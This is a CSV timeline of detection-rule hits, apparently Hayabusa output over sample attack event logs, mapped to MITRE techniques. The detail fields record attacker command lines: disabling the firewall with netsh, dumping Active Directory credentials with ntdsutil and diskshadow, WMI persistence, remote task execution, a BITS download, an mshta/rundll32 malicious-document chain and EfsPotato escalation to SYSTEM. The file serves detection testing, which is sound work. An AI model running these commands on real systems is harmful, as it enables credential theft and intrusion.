2021-06-04 04:17:47.699 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-04 18:30:48.170 +09:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx
2021-06-06 04:35:16.721 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
2021-06-06 04:36:32.683 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
2021-06-06 05:17:05.433 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx
2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.390 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx
2021-08-08 08:32:57.348 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-17 21:26:51.403 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.457 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.881 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.997 +09:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 
(LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.303 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.315 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: 
C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.324 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.335 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: 
SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.342 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 